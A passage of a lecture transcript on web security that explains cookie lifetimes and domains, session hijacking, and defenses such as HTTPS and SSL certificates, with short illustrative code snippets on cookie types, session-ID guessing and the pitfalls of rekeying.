
736
00:32:06,646 --> 00:32:07,686
So what's the implication?

737
00:32:07,946 --> 00:32:08,376
Axle?

738
00:32:08,976 --> 00:32:10,666
>> Well, it's going
to live forever

739
00:32:10,726 --> 00:32:19,846
so anybody finding your
computer in a week will be able

740
00:32:20,166 --> 00:32:21,246
to see the cookie
and anyone -- yeah.

741
00:32:21,246 --> 00:32:24,376
>> So, careful, it's actually
the opposite in this case.

742
00:32:24,406 --> 00:32:26,716
So PHPSESSID -- so when
you set an expiration

743
00:32:26,716 --> 00:32:29,566
to zero whereby you
don't have an expiration

744
00:32:29,566 --> 00:32:32,126
that actually means the opposite
which is that this is only going

745
00:32:32,126 --> 00:32:33,526
to live for the life
of the browser.

746
00:32:33,526 --> 00:32:37,186
So as soon as you close your --
quit your browser or even worse,

747
00:32:37,186 --> 00:32:38,296
restart your computer,

748
00:32:38,566 --> 00:32:40,266
that session cookie
is going to be lost.

749
00:32:40,316 --> 00:32:43,906
The server might still have the
contents of your session stored

750
00:32:43,906 --> 00:32:46,416
around in a temp file
or in a database,

751
00:32:46,636 --> 00:32:48,626
but your browser is not supposed

752
00:32:48,626 --> 00:32:52,796
to resend this cookie once you
have actually quit the browser.

753
00:32:52,796 --> 00:32:55,366
Now, changing tabs, sometimes
the behavior is not quite

754
00:32:55,366 --> 00:32:57,116
predictable but generally

755
00:32:57,266 --> 00:33:00,456
until you quit your browser
session cookies might linger,

756
00:33:00,596 --> 00:33:02,986
but a session cookie by
definition is meant to live only

757
00:33:02,986 --> 00:33:05,396
for the life of the
browser actually running.

758
00:33:05,526 --> 00:33:06,686
When you quit it,
it should go away.

759
00:33:07,096 --> 00:33:10,436
By contrast if you actually
saw an expiration date next

760
00:33:10,436 --> 00:33:13,566
to path here, path is slash,
just signifying the root

761
00:33:13,566 --> 00:33:15,476
of the web server,
then you could specify

762
00:33:15,476 --> 00:33:18,966
that this cookie is in fact good
for a week, a month, a year,

763
00:33:19,146 --> 00:33:21,526
and you could typically do
that yourself if you wanted

764
00:33:21,526 --> 00:33:23,306
to remember something
for some amount of time.
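The distinction between the two kinds of cookie can be sketched as a check for an expiry attribute. cookie_kind is a hypothetical helper, the cookie values are invented, and the match assumes attributes are written in the common "; name=value" form.

```shell
# cookie_kind is a hypothetical helper: given one Set-Cookie header value, it
# reports whether the cookie carries an Expires or Max-Age attribute.
cookie_kind() {
  # Lowercase first, since attribute names are not case sensitive.
  case "$(printf '%s' "$1" | tr 'A-Z' 'a-z')" in
    *"; expires="*|*"; max-age="*) echo "persistent" ;;
    *) echo "session" ;;
  esac
}

cookie_kind 'PHPSESSID=abc123; path=/'              # no expiry: session cookie
cookie_kind 'remember=1; Max-Age=604800; path=/'    # 604800 seconds is 7 days
```

A cookie reported as "session" is one the browser is meant to drop when it quits; one reported as "persistent" is kept until the stated time.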

765
00:33:23,636 --> 00:33:25,956
So the second Set-Cookie
line here is just stupid.

766
00:33:26,146 --> 00:33:28,536
It seems that the programmer

767
00:33:28,536 --> 00:33:33,836
of this webpage has specified
a secret key of 12345.

768
00:33:33,836 --> 00:33:36,246
In other words, feels
like the website is trying

769
00:33:36,246 --> 00:33:38,366
to remember your password
by storing it in a cookie.

770
00:33:38,686 --> 00:33:39,776
So what is bad about this?

771
00:33:39,776 --> 00:33:42,166
Well one, there's absolutely
no reason as we've seen

772
00:33:42,166 --> 00:33:44,376
to store the user's
password in a cookie.

773
00:33:44,656 --> 00:33:48,156
It suffices in PHP through
all of our login examples just

774
00:33:48,156 --> 00:33:53,396
to use the session and just
remember the user by way

775
00:33:53,396 --> 00:33:54,676
of this random identifier.

776
00:33:54,676 --> 00:33:57,066
You don't have to have the
user send you his username

777
00:33:57,066 --> 00:33:59,016
and password, again,
and again, and again.

778
00:33:59,346 --> 00:34:01,536
So this would be
indicative of bad practice

779
00:34:01,536 --> 00:34:04,426
or at least an opportunity
now for a bad guy to kind

780
00:34:04,426 --> 00:34:06,716
of do something malicious
with that.

781
00:34:06,896 --> 00:34:07,946
Yeah? Axle?

782
00:34:08,256 --> 00:34:10,636
>> I have a question.

783
00:34:10,706 --> 00:34:13,946
When I work with cookies
[inaudible] specify which domain

784
00:34:13,946 --> 00:34:16,116
and sub-domain the
cookie was valid in,

785
00:34:16,116 --> 00:34:19,226
so not specifying [inaudible]
that make the cookie valid

786
00:34:19,386 --> 00:34:22,656
in all sub-domains of
the root of the path?

787
00:34:22,656 --> 00:34:23,946
>> Exactly, in this case.

788
00:34:23,946 --> 00:34:26,896
Yeah. So, if we had visited
foo.com, the cookie is valid

789
00:34:26,896 --> 00:34:29,436
for foo.com and anything
below it.

790
00:34:30,126 --> 00:34:32,316
So www.foo.com,
bar.foo.com,

791
00:34:32,316 --> 00:34:33,566
or the like.

792
00:34:33,566 --> 00:34:35,416
>> Would that be a
security threat as well

793
00:34:35,416 --> 00:34:38,566
if you were running a big site
that has multiple sub-domains?

794
00:34:38,646 --> 00:34:39,546
>> It's a good question.

795
00:34:39,546 --> 00:34:40,406
Potentially yes.

796
00:34:40,406 --> 00:34:42,606
If you're running a big site
with multiple sub-domains,

797
00:34:42,606 --> 00:34:44,886
or different applications,
web applications running

798
00:34:44,886 --> 00:34:46,826
at different sub-domains,
absolutely.

799
00:34:46,826 --> 00:34:49,006
Generally you should put cookies

800
00:34:49,396 --> 00:34:52,666
in the most narrowly defined
cookie space possible.

801
00:34:52,906 --> 00:34:55,896
So if you have a website
that is, again, foo.com,

802
00:34:56,116 --> 00:35:00,166
and you have a.foo.com,
b.foo.com, c.foo.com,

803
00:35:00,166 --> 00:35:02,106
all of which are
different applications maybe

804
00:35:02,106 --> 00:35:03,966
with different users,
different functionality,

805
00:35:04,246 --> 00:35:06,646
then you should really
be setting your cookies

806
00:35:06,776 --> 00:35:09,266
in a.foo.com, or b.foo.com,

807
00:35:09,266 --> 00:35:12,246
and nothing should
go in foo.com itself.

808
00:35:12,916 --> 00:35:13,726
Really good point.

809
00:35:14,466 --> 00:35:17,256
You can also mitigate
this in some part by,

810
00:35:17,256 --> 00:35:18,916
as we saw with mod_rewrite,

811
00:35:18,916 --> 00:35:21,086
the ability to redirect the
user to different URLs.

812
00:35:21,086 --> 00:35:23,516
If you want to standardize
not on CS75.net,

813
00:35:23,746 --> 00:35:27,286
but www.CS75.net,
you can ensure

814
00:35:27,286 --> 00:35:28,696
through a redirect mechanism

815
00:35:28,696 --> 00:35:30,016
that you're only
planting the cookies

816
00:35:30,016 --> 00:35:33,246
in the www version
ultimately, which can be useful.

817
00:35:33,776 --> 00:35:37,716
All right, so let's
push a little harder

818
00:35:37,716 --> 00:35:39,896
on this cookie issue
in session hijacking.

819
00:35:39,896 --> 00:35:42,456
So session hijacking, again, to
be clear, refers to the process

820
00:35:42,456 --> 00:35:44,466
of someone stealing
your cookie somehow,

821
00:35:44,466 --> 00:35:47,076
whether by sitting near you
in Starbucks, or having access

822
00:35:47,076 --> 00:35:49,316
to the routers on the Internet
between Points A and B,

823
00:35:49,496 --> 00:35:52,716
and then presenting it to
the world as their own.

824
00:35:53,316 --> 00:35:56,676
Now how can you go about
hijacking someone's session?

825
00:35:56,916 --> 00:35:58,036
Well physical access.

826
00:35:59,186 --> 00:36:01,246
If you have physical access to
someone's computer how do you go

827
00:36:01,246 --> 00:36:02,376
about finding their
session cookie?

828
00:36:02,376 --> 00:36:02,556
Yeah, Jack?

829
00:36:02,646 --> 00:36:03,986
>> You find their cookies folder

830
00:36:03,986 --> 00:36:05,896
and you take whatever
is in there.

831
00:36:05,896 --> 00:36:06,376
>> Yeah, exactly.

832
00:36:06,376 --> 00:36:08,276
You can poke around in
some operating systems,

833
00:36:08,276 --> 00:36:10,466
in some browsers, literally
to a folder somewhere

834
00:36:10,466 --> 00:36:12,056
on the hard drive
that contains cookies.

835
00:36:12,056 --> 00:36:15,506
Now in fact, the folder tends
not to contain session cookies

836
00:36:15,556 --> 00:36:17,906
because it tends to
contain persistent cookies

837
00:36:17,906 --> 00:36:20,246
that have an expiration
that's not zero,

838
00:36:20,646 --> 00:36:23,166
but in this case you
can probably open like,

839
00:36:23,236 --> 00:36:27,006
about:cookies,
or about:history.

840
00:36:27,006 --> 00:36:28,946
Generally in all browsers
you can start poking

841
00:36:28,946 --> 00:36:30,236
around your own history.

842
00:36:30,506 --> 00:36:32,596
So if you have physical
access to your sibling's

843
00:36:32,596 --> 00:36:34,026
or your roommate's computer

844
00:36:34,096 --> 00:36:37,006
and they've left it unlocked
there's really not much

845
00:36:37,006 --> 00:36:39,046
of a barrier between
you and their cookies.

846
00:36:39,046 --> 00:36:41,286
It might take some
technical know-how but frankly

847
00:36:41,286 --> 00:36:44,116
if you Google how to find
cookies in Firefox or the like,

848
00:36:44,116 --> 00:36:46,376
I'm sure someone has
posted how you can go

849
00:36:46,376 --> 00:36:48,306
about finding cookies
in various browsers.

850
00:36:48,306 --> 00:36:51,266
Useful for diagnostic
purposes, a little scary

851
00:36:51,266 --> 00:36:55,416
if you're vulnerable to
having your session hijacked.

852
00:36:55,926 --> 00:36:56,646
Packet sniffing.

853
00:36:56,646 --> 00:36:58,946
So we talked about this earlier,
whereby it's really not all

854
00:36:58,946 --> 00:37:00,646
that hard to download
free software these days

855
00:37:00,646 --> 00:37:02,166
that just sniffs
wireless traffic

856
00:37:02,426 --> 00:37:03,886
in Starbucks, in this room.

857
00:37:03,986 --> 00:37:06,166
Anytime you're not using
something like WPA2,

858
00:37:06,166 --> 00:37:08,606
the encryption protocol
that's used by a lot

859
00:37:08,606 --> 00:37:11,226
of wireless routers these
days to encrypt your traffic,

860
00:37:11,546 --> 00:37:14,476
well then anyone sitting near
you right now could be sniffing

861
00:37:14,476 --> 00:37:16,416
your traffic and
stealing your cookie

862
00:37:16,706 --> 00:37:19,306
from any website
that's unencrypted.

863
00:37:19,546 --> 00:37:22,696
So session fixation is just
an unnecessarily fancy way

864
00:37:22,696 --> 00:37:25,516
of saying hardcoding a
session ID as your own.

865
00:37:25,716 --> 00:37:28,316
Now in theory you could just
guess someone's session ID

866
00:37:28,706 --> 00:37:31,316
by picking a random sequence
of letters and numbers,

867
00:37:31,616 --> 00:37:33,576
but the reality is, as
you saw, these things are

868
00:37:33,576 --> 00:37:36,156
so long that's going to take
a huge amount of time for you

869
00:37:36,156 --> 00:37:38,236
to try guessing all
possible session values --

870
00:37:38,546 --> 00:37:40,836
session keys and that's
why they're so long.
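
To put a rough number on why guessing is hopeless, here is a small sketch. It assumes a 128-bit session ID written as 32 hex characters and a guessing rate of a billion tries per second; both figures are illustrative assumptions, not values stated in the lecture.

```python
import secrets


def random_session_id(num_bytes=16):
    """Generate a random session ID as a hex string (2 hex chars per byte)."""
    return secrets.token_hex(num_bytes)


def years_to_try_all(num_bytes, guesses_per_second):
    """Years needed to try every possible ID of the given size."""
    total_ids = 2 ** (8 * num_bytes)
    seconds = total_ids / guesses_per_second
    return seconds / (60 * 60 * 24 * 365)


sid = random_session_id()
print(sid, len(sid))

# Assumed attacker speed: one billion guesses per second.
print(years_to_try_all(16, 1_000_000_000))
```

Under those assumptions the exhaustive search takes far longer than any session lives, which is why sniffing or physical access is the realistic threat.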

871
00:37:40,876 --> 00:37:42,946
But as soon as you found
it maybe by sniffing

872
00:37:42,946 --> 00:37:45,646
or physical access,
session fixation just refers

873
00:37:45,726 --> 00:37:50,296
to the spoofing of your own
cookie as by writing a program

874
00:37:50,296 --> 00:37:52,706
or downloading some program
that says here, use this cookie

875
00:37:52,706 --> 00:37:55,076
as my own and not what
the web server gave me.

876
00:37:55,076 --> 00:37:57,636
And then XSS, cross
site scripting attacks,

877
00:37:57,636 --> 00:37:59,226
we've discussed these a
couple times, and we'll see

878
00:37:59,226 --> 00:38:01,416
in just a little bit an example.

879
00:38:02,106 --> 00:38:04,756
So how do we mitigate
these threats?

880
00:38:04,756 --> 00:38:06,896
Like this is a bunch of
scenarios, all of which lead

881
00:38:06,896 --> 00:38:09,826
to a bad ending for me whereby
my session's been hijacked.

882
00:38:10,286 --> 00:38:11,936
What kinds of defenses
do we have

883
00:38:11,936 --> 00:38:13,986
against these various scenarios?

884
00:38:15,416 --> 00:38:15,726
Axle?

885
00:38:16,096 --> 00:38:18,376
>> Well, physical access,
you don't really have

886
00:38:18,376 --> 00:38:20,216
that much defense against.

887
00:38:20,276 --> 00:38:22,896
Once somebody has your
computer they can essentially

888
00:38:22,896 --> 00:38:23,666
do everything.

889
00:38:23,666 --> 00:38:23,886
>> Okay.

890
00:38:24,246 --> 00:38:27,636
>> But the packet sniffing
and session fixation,

891
00:38:27,766 --> 00:38:31,276
that could be fixed by sending
the data encrypted by --

892
00:38:31,276 --> 00:38:31,796
>> Good.

893
00:38:32,156 --> 00:38:38,636
>> -- HTTPS and the XSS could be
fixed by being really thorough

894
00:38:38,636 --> 00:38:40,916
and escaping everything that
the user sends [inaudible].

895
00:38:41,086 --> 00:38:42,746
>> Okay, good.

896
00:38:42,746 --> 00:38:44,696
So in the case of packet
sniffing especially,

897
00:38:44,696 --> 00:38:46,856
just using HTTPS
goes a long way,

898
00:38:47,136 --> 00:38:49,716
because HTTPS is end-to-end
encryption between points A

899
00:38:49,746 --> 00:38:53,766
and point B. And in
this way you're ensuring

900
00:38:53,766 --> 00:38:56,556
that your cookies are
among the things encrypted

901
00:38:56,846 --> 00:39:00,136
so no one can see actually
what you've encrypted

902
00:39:00,136 --> 00:39:01,006
in that scenario.

903
00:39:01,036 --> 00:39:05,386
All right, but say the
website doesn't offer HTTPS,

904
00:39:05,476 --> 00:39:09,346
so what if I just instead
turn on the encryption feature

905
00:39:09,346 --> 00:39:13,176
of my wireless router, in
Starbucks or in my home,

906
00:39:13,426 --> 00:39:14,836
or even on Harvard's campus?

907
00:39:14,836 --> 00:39:16,326
What if I just turn on WPA2

908
00:39:16,326 --> 00:39:20,166
so there's a little padlock
icon then next to the name

909
00:39:20,226 --> 00:39:23,696
of the router in my list
on Mac OS or Windows?

910
00:39:24,036 --> 00:39:24,716
Does that solve it?

911
00:39:24,716 --> 00:39:24,826
Yeah?

912
00:39:25,276 --> 00:39:27,386
>> Well anybody who's ever
done a traceroute sees

913
00:39:27,476 --> 00:39:30,346
that the actual packet is sent
through multiple [inaudible]

914
00:39:30,346 --> 00:39:33,146
and many networks before
it actually arrives,

915
00:39:33,256 --> 00:39:36,126
so anybody on any of those
networks can essentially do it

916
00:39:36,356 --> 00:39:38,056
even if they don't have --

917
00:39:38,056 --> 00:39:40,786
and if they don't have
WPA2 they can sniff it.

918
00:39:41,176 --> 00:39:41,856
>> Okay, good.

919
00:39:41,856 --> 00:39:45,326
And to be clear then, when I
turn on something like WPA2

920
00:39:45,326 --> 00:39:48,506
and connect to an access
point, a WiFi access point

921
00:39:48,706 --> 00:39:51,436
that requires a password, for
instance that one right there

922
00:39:51,436 --> 00:39:53,216
on the wall with the
green blinking light,

923
00:39:54,566 --> 00:39:57,056
where is my data encrypted,
between what points?

924
00:39:58,496 --> 00:39:58,616
Yeah?

925
00:39:59,386 --> 00:40:00,936
>> Well, your computer
and the router.

926
00:40:01,176 --> 00:40:02,876
>> Good. And where
is it not encrypted?

927
00:40:03,166 --> 00:40:03,626
>> Anywhere else.

928
00:40:04,006 --> 00:40:06,286
>> Good, between the
router and anywhere else.

929
00:40:06,286 --> 00:40:07,516
All right, so good.

930
00:40:07,516 --> 00:40:09,896
So, what's the implication
there?

931
00:40:09,896 --> 00:40:12,326
Well, you're protecting yourself
against someone in Starbucks

932
00:40:12,326 --> 00:40:14,696
but you're not protecting against
someone who's somehow sitting

933
00:40:14,696 --> 00:40:18,476
between you and point B, whether
it's some random staff member

934
00:40:18,476 --> 00:40:20,196
in some facility
that has a router

935
00:40:20,326 --> 00:40:22,056
or it's someone in
Amazon's area.

936
00:40:22,446 --> 00:40:24,606
In short, you don't have
true end-to-end encryption.

937
00:40:24,606 --> 00:40:26,186
So, better, but not great.

938
00:40:26,476 --> 00:40:30,586
And XSS we'll come back
to in just a bit as to how

939
00:40:30,586 --> 00:40:32,076
to try protecting against that.

940
00:40:32,506 --> 00:40:34,746
But there's some other
things I propose here.

941
00:40:35,066 --> 00:40:37,436
Hard-to-guess session keys.

942
00:40:37,786 --> 00:40:39,356
So frankly they're already
pretty hard to guess

943
00:40:39,566 --> 00:40:44,486
but clearly PHP's long session keys
are not a complete protection,

944
00:40:44,686 --> 00:40:45,336
because again, as soon

945
00:40:45,336 --> 00:40:46,776
as you sniff then you
can just copy/paste.

946
00:40:46,936 --> 00:40:49,076
So making them even longer
is probably not going

947
00:40:49,076 --> 00:40:49,776
to gain as much.

948
00:40:50,146 --> 00:40:51,876
What about rekeying the session?

949
00:40:51,876 --> 00:40:57,076
In other words changing the user's
session ID, changing the value

950
00:40:57,076 --> 00:41:01,796
of their PHPSESSID cookie every
few seconds, every few minutes,

951
00:41:02,026 --> 00:41:05,196
every request, whatever, just
change it once in a while.

952
00:41:05,446 --> 00:41:06,046
Good? Bad?

953
00:41:07,366 --> 00:41:07,686
Axle?

954
00:41:07,686 --> 00:41:12,316
>> I see a potential
risk for that.

955
00:41:12,966 --> 00:41:15,396
Wouldn't you be sending
the session --

956
00:41:15,806 --> 00:41:19,356
wouldn't you be sending it
many times so that somebody

957
00:41:19,356 --> 00:41:20,436
on the network could see well,

958
00:41:20,556 --> 00:41:23,806
this computer is every minute
sending out a session ID

959
00:41:23,806 --> 00:41:26,026
and I know it lasts for
a minute, so they'll see.

960
00:41:26,076 --> 00:41:29,586
If you just send it once then
it might be harder for somebody

961
00:41:29,586 --> 00:41:32,626
to actually find that in
[inaudible] in all the traffic.

962
00:41:32,716 --> 00:41:32,916
>> Okay.

963
00:41:33,096 --> 00:41:35,456
>> If you send it continuously
somebody might notice that

964
00:41:35,456 --> 00:41:37,286
and that might be
a security threat,

965
00:41:37,286 --> 00:41:39,536
even though it only lasts for
like a minute or whatever.

966
00:41:39,536 --> 00:41:40,276
>> Okay, good.

967
00:41:40,276 --> 00:41:43,616
So rekeying really just means
sending a new Set-Cookie header,

968
00:41:43,866 --> 00:41:45,166
but the problem is
if you're worried

969
00:41:45,166 --> 00:41:46,616
about people sniffing your keys

970
00:41:46,616 --> 00:41:49,306
and that's why you're changing
the key, well if the threat is

971
00:41:49,306 --> 00:41:51,196
that they're sniffing your
keys you can change it as much

972
00:41:51,196 --> 00:41:52,926
as you want, the bad
guy's still just going

973
00:41:52,926 --> 00:41:53,836
to sniff the new ones.

974
00:41:53,836 --> 00:41:56,536
So you might be making his life
more annoying in that he has

975
00:41:56,536 --> 00:41:59,466
to constantly stay up to
date with your latest key,

976
00:41:59,696 --> 00:42:01,626
but actually there's
a worse scenario here.

977
00:42:01,626 --> 00:42:03,846
If the web server is
changing the key --

978
00:42:04,206 --> 00:42:07,666
>> Well if the person,
whoever's trying to hack in,

979
00:42:07,826 --> 00:42:11,106
sniffs your cookie or your
key, sniffs your session

980
00:42:11,726 --> 00:42:14,546
and takes the session and
they log on in some period

981
00:42:14,546 --> 00:42:17,346
of time while it's
expired, the session,

982
00:42:17,476 --> 00:42:19,596
they get your session
ID and they also make it

983
00:42:20,136 --> 00:42:22,446
so that you can't [inaudible]
on with that same session.

984
00:42:22,586 --> 00:42:22,976
>> Perfect.

985
00:42:22,976 --> 00:42:26,256
If you rekey the session but the
bad guy's already sniffed your

986
00:42:26,386 --> 00:42:30,566
initial ID, spoofed his
own as yours, so as to log

987
00:42:30,566 --> 00:42:32,086
into your Facebook
account or whatever,

988
00:42:32,366 --> 00:42:34,866
and now the server decides
okay, it's time to rekey

989
00:42:34,866 --> 00:42:36,246
to prevent bad guys
from getting in,

990
00:42:36,246 --> 00:42:38,826
who's going to get the
new key, potentially first?

991
00:42:38,826 --> 00:42:42,756
The bad guy, at which point
your cookie is no longer valid

992
00:42:43,026 --> 00:42:44,836
so you've effectively just been
logged out of your account.

993
00:42:45,256 --> 00:42:47,516
So in short, rekeying
while it may seem like, oh,

994
00:42:47,516 --> 00:42:49,606
this is a good way to sort
of dodge the adversary,

995
00:42:49,926 --> 00:42:51,306
doesn't really fundamentally
help us

996
00:42:51,306 --> 00:42:53,236
because it's still
sending the rekeying

997
00:42:53,236 --> 00:42:55,006
over the same insecure
mechanism.
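
The rekeying race can be sketched with a toy in-memory session store. The SessionStore class, its method names, and the username are all hypothetical, written in Python for illustration; this is not how PHP implements sessions.

```python
import secrets


class SessionStore:
    """Toy server-side table mapping session IDs to usernames."""

    def __init__(self):
        self._sessions = {}

    def login(self, username):
        sid = secrets.token_hex(16)
        self._sessions[sid] = username
        return sid

    def lookup(self, sid):
        return self._sessions.get(sid)

    def rekey(self, old_sid):
        """Swap old_sid for a fresh ID; the old one stops working."""
        username = self._sessions.pop(old_sid, None)
        if username is None:
            return None
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = username
        return new_sid


store = SessionStore()
victim_sid = store.login("alice")

# The attacker sniffed the ID off an unencrypted connection...
sniffed_sid = victim_sid
# ...and happens to make the request on which the server rekeys.
attacker_sid = store.rekey(sniffed_sid)

print(store.lookup(attacker_sid))  # the attacker now holds the live session
print(store.lookup(victim_sid))    # the victim's cookie no longer matches anything
```

In this sketch the legitimate user ends up logged out while the attacker keeps the session, which is the worse scenario described above.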

998
00:42:55,296 --> 00:42:57,966
Encryption, this is actually
a pretty decent solution,

999
00:42:57,966 --> 00:43:01,546
and using at least
something like WiFi

1000
00:43:01,646 --> 00:43:04,346
with encryption enabled so at
least you're not vulnerable

1001
00:43:04,346 --> 00:43:06,096
to random people who are
sitting in the airport

1002
00:43:06,096 --> 00:43:07,706
or Starbucks or bored near you.

1003
00:43:07,996 --> 00:43:10,406
More likely than not someone
near you cares a little more

1004
00:43:10,406 --> 00:43:12,326
about your data, roommate,
sibling, or whatnot,

1005
00:43:12,326 --> 00:43:13,936
than some random
person on the Internet.

1006
00:43:13,936 --> 00:43:17,296
So at least that raises the bar,
but even better would be HTTPS.

1007
00:43:17,416 --> 00:43:19,266
Unfortunately not all
servers support that

1008
00:43:19,496 --> 00:43:21,456
and indeed it was
only a year or so ago

1009
00:43:21,456 --> 00:43:25,176
that Google started offering
it for Gmail by default,

1010
00:43:25,276 --> 00:43:29,276
and Facebook only a few months
back started offering SSL

1011
00:43:29,276 --> 00:43:30,476
support as well.

1012
00:43:31,106 --> 00:43:33,306
So, not all websites
have done it.

1013
00:43:33,556 --> 00:43:34,996
Because what's involved in SSL?

1014
00:43:34,996 --> 00:43:39,006
How do you make your
site run on HTTPS?

1015
00:43:39,006 --> 00:43:39,836
What do you need?

1016
00:43:40,236 --> 00:43:40,303
Yeah?

1017
00:43:40,506 --> 00:43:44,776
>> Well you buy a certificate
that a person sells and the way

1018
00:43:44,776 --> 00:43:48,926
that people sell certificates
is through a big chain of trust.

1019
00:43:48,926 --> 00:43:53,726
Yeah, somebody trusts
somebody and all the vendors,

1020
00:43:53,726 --> 00:43:55,716
that sell certificates,
they're backed

1021
00:43:55,716 --> 00:43:57,706
up by bigger players,
big companies.

1022
00:43:57,736 --> 00:44:00,086
So that's essentially
how it works.

1023
00:44:00,466 --> 00:44:04,286
And it's not really -- it
can be assuring for the user

1024
00:44:04,596 --> 00:44:07,796
but it's mostly just
getting the green bar

1025
00:44:08,146 --> 00:44:12,276
and then an image say
certificate, like [inaudible].

1026
00:44:12,426 --> 00:44:13,076
>> Okay. Good.

1027
00:44:13,076 --> 00:44:16,766
So, in short if you want to
enable SSL on your server, one,

1028
00:44:16,766 --> 00:44:19,666
you have to buy -- or you
should buy a certificate

1029
00:44:19,736 --> 00:44:21,666
from someone reasonably
reputable.

1030
00:44:21,666 --> 00:44:23,166
You don't need to break
the bank by paying

1031
00:44:23,166 --> 00:44:25,276
for $1000 VeriSign certificates.

1032
00:44:25,276 --> 00:44:28,236
Generally $50 or
$100 ones from places

1033
00:44:28,236 --> 00:44:30,146
like GoDaddy or the
like suffice.

1034
00:44:30,526 --> 00:44:33,146
But you do have to buy this
because you need someone else

1035
00:44:33,426 --> 00:44:39,286
to endorse the fact that
you are who you say you are.

1036
00:44:39,286 --> 00:44:40,646
In other words, if
I go to GoDaddy

1037
00:44:40,646 --> 00:44:42,746
and buy a certificate,
before they give me

1038
00:44:42,746 --> 00:44:44,766
that certificate they're
going to send an email

1039
00:44:44,946 --> 00:44:47,396
to the email address of the
person who bought that domain.

1040
00:44:47,596 --> 00:44:49,916
Hopefully it's me, because if
that's the case they're going

1041
00:44:49,916 --> 00:44:51,336
to send an email to
the email address

1042
00:44:51,336 --> 00:44:53,466
with which I bought the domain,
that email account I'm going

1043
00:44:53,466 --> 00:44:55,816
to check, I'm going to
see, oh, someone is trying

1044
00:44:55,816 --> 00:44:59,126
to buy an SSL certificate
for CS75.net, is this okay?

1045
00:44:59,126 --> 00:45:00,346
Click this link to approve.

1046
00:45:00,496 --> 00:45:02,686
And if indeed I've received
that email I can approve it.

1047
00:45:02,826 --> 00:45:06,176
By contrast, if Axle owns some
domain name, like Axle.com,

1048
00:45:06,406 --> 00:45:09,426
and I want to, for whatever
reason buy an SSL certificate

1049
00:45:09,426 --> 00:45:10,206
for his domain.

1050
00:45:10,306 --> 00:45:11,976
Because maybe I'm
trying to trick users

1051
00:45:11,976 --> 00:45:15,246
into visiting my website by
calling it the same domain

1052
00:45:15,246 --> 00:45:17,096
and therefore, I want
to trick them even more

1053
00:45:17,096 --> 00:45:19,836
into thinking it's secure
by buying an SSL certificate

1054
00:45:19,926 --> 00:45:23,096
for his domain name, he's going
to get that email confirmation

1055
00:45:23,096 --> 00:45:25,676
because he bought the domain,
he gave them his email address,

1056
00:45:25,956 --> 00:45:26,996
and unfortunately
they're not going

1057
00:45:27,046 --> 00:45:29,456
to hand me the SSL
certificate until he confirms.

1058
00:45:29,666 --> 00:45:32,916
And unless he actually confirms,
say because he isn't reading the email carefully,

1059
00:45:32,916 --> 00:45:36,186
well then I'm not going to get
that certificate after all.

1060
00:45:36,406 --> 00:45:38,626
So once I do that I
install it in my web server.

1061
00:45:38,626 --> 00:45:40,986
We saw a while back
in httpd.conf you have

1062
00:45:40,986 --> 00:45:42,886
to specify the file
name of the certificate

1063
00:45:42,886 --> 00:45:45,616
that you've downloaded as well
as your so-called private key,

1064
00:45:45,616 --> 00:45:47,766
which is a number that
you have generated.

1065
00:45:47,766 --> 00:45:50,546
Because at the end of the
day recall that SSL boils

1066
00:45:50,546 --> 00:45:52,716
down to this thing called
public key cryptography,

1067
00:45:53,126 --> 00:45:58,036
which is a mechanism
mathematically whereby a person

1068
00:45:58,036 --> 00:46:02,026
has a private key and public
key, and which of those is used

1069
00:46:02,026 --> 00:46:04,396
for what process when
it comes to encryption?

1070
00:46:05,486 --> 00:46:07,376
With which of those
keys, private or public,

1071
00:46:07,726 --> 00:46:10,366
do you encrypt information
if you know?

1072
00:46:10,936 --> 00:46:15,256
Yeah? Axle?

1073
00:46:15,396 --> 00:46:17,736
>> The private one?

1074
00:46:18,036 --> 00:46:21,086
>> Not a bad guess,
but it's the opposite.

1075
00:46:21,146 --> 00:46:24,676
So in this case, in public-key
crypto you start the process

1076
00:46:24,676 --> 00:46:27,176
by generating two
really big random numbers

1077
00:46:27,236 --> 00:46:28,766
that are somehow --
not quite random,

1078
00:46:28,766 --> 00:46:30,436
they're somehow mathematically
related.

1079
00:46:30,736 --> 00:46:31,926
And they have these
key properties

1080
00:46:31,926 --> 00:46:35,926
in public-key crypto whereby
the private key is the only key

1081
00:46:35,926 --> 00:46:39,566
in the world that can decrypt
information that's been

1082
00:46:39,566 --> 00:46:40,906
encrypted with the public key.

1083
00:46:41,226 --> 00:46:42,366
Now why is this compelling?

1084
00:46:42,646 --> 00:46:44,376
The fact that I have
two keys is really nice

1085
00:46:44,496 --> 00:46:47,116
because suppose now
Jack and I --

1086
00:46:47,116 --> 00:46:50,306
suppose I'm a user on the
Internet and Jack has a website

1087
00:46:50,306 --> 00:46:51,836
and he's trying to sell widgets

1088
00:46:51,836 --> 00:46:53,806
on this website securely
using HTTPS,

1089
00:46:53,806 --> 00:46:55,676
and therefore he's
bought an SSL certificate

1090
00:46:55,956 --> 00:46:58,166
and somehow I need to
communicate securely with Jack.

1091
00:46:58,436 --> 00:47:01,386
Well, unfortunately most
encryption algorithms assume a

1092
00:47:01,386 --> 00:47:03,246
private secret between
me and Jack.

1093
00:47:03,526 --> 00:47:05,376
For instance, if you think
back to a silly example

1094
00:47:05,376 --> 00:47:08,386
in grade school, if you wanted
to pass a note to a classmate

1095
00:47:08,386 --> 00:47:10,226
or someone you were crushing on.

1096
00:47:10,226 --> 00:47:12,456
You want to send them a
secret note, literally pass it

1097
00:47:12,506 --> 00:47:14,896
to a classmate and then
give it to the boy or girl

1098
00:47:14,896 --> 00:47:17,296
across the room, but you
don't really want the teacher,

1099
00:47:17,296 --> 00:47:19,436
let alone the kids between
you and that boy or girl

1100
00:47:19,436 --> 00:47:21,906
to intercept it and read
your secret love note,

1101
00:47:21,906 --> 00:47:22,876
or whatever it is
you're sending.

1102
00:47:23,176 --> 00:47:25,116
So a kid might do
something super simple,

1103
00:47:25,716 --> 00:47:28,916
like change the letters around,
so instead of sending an A,

1104
00:47:28,916 --> 00:47:31,126
you say a B. Instead
of writing a B,

1105
00:47:31,126 --> 00:47:33,316
you write a C. C,
D, and so forth.

1106
00:47:33,316 --> 00:47:34,566
Something simple like that,

1107
00:47:34,936 --> 00:47:37,596
and in fact there's an algorithm
known as the Caesar cipher,

1108
00:47:37,776 --> 00:47:41,266
or ROT13, which is a
specific example of this

1109
00:47:41,266 --> 00:47:42,526
that does exactly that.

1110
00:47:42,636 --> 00:47:44,266
Right? Because what's a
non-technical teacher going

1111
00:47:44,266 --> 00:47:44,476
to do?

1112
00:47:44,476 --> 00:47:45,726
They're going to see this
note, it's going to look

1113
